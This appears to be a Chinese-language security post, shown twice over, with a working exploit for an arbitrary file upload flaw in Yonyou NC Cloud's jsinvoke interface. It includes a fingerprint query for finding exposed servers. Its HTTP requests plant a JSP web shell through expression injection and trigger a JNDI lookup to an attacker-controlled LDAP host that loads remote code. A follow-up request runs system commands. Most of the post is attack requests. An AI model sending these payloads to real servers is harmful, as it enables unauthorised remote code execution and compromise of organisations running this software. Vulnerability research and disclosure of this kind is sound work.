Yonyou NC Cloud jsinvoke 任意文件上传漏洞

# Yonyou NC Cloud jsinvoke 任意文件上传漏洞 ## 漏洞描述 Yonyou NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器中，获取系统权限 ## 漏洞影...

Yonyou NC Cloud jsinvoke 任意文件上传漏洞
=================================

漏洞描述
----

Yonyou NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器中，获取系统权限

漏洞影响
----

Yonyou NC Cloud

网络测绘
----

app="Yonyou-NC-Cloud"

漏洞复现
----

登陆页面

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f7593081f8e1f5bfeea5b234ca56d0635a284c4e806fa.jpg)

验证POC

```plain
POST /uapjs/jsinvoke/?action=invoke
Content-Type: application/json

{
    "serviceName":"nc.itf.iufo.IBaseSPService",
    "methodName":"saveXStreamConfig",
    "parameterTypes":[
        "java.lang.Object",
        "java.lang.String"
    ], 
    "parameters":[
        "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
        "webapps/nc_web/407.jsp"
    ]
}
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 
Connection: Keep-Alive
Content-Length: 253
Content-Type: application/x-www-form-urlencoded

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/301.jsp"]}
```

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f259504a90bbba85da417d4fd4ce5eb522730ce13fa46.jpg)

```plain
/cmdtest.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream()) 
```

![img](https://oss-yg-cztt.yun.qianxin.com/butian-public/f757684de008d46beea3f1a3561539efe08113129e480.jpg)

Yonyou NC Cloud jsinvoke 任意文件上传漏洞

漏洞描述

Yonyou NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器中，获取系统权限

漏洞影响

Yonyou NC Cloud

网络测绘

app="Yonyou-NC-Cloud"

漏洞复现

登陆页面

验证POC

POST /uapjs/jsinvoke/?action=invoke
Content-Type: application/json

{
    "serviceName":"nc.itf.iufo.IBaseSPService",
    "methodName":"saveXStreamConfig",
    "parameterTypes":[
        "java.lang.Object",
        "java.lang.String"
    ], 
    "parameters":[
        "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",
        "webapps/nc_web/407.jsp"
    ]
}
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 
Connection: Keep-Alive
Content-Length: 253
Content-Type: application/x-www-form-urlencoded

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/301.jsp"]}

/cmdtest.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())

发表于 2024-07-12 18:45:01
阅读 ( 2247 )
分类：OA产品

站长统计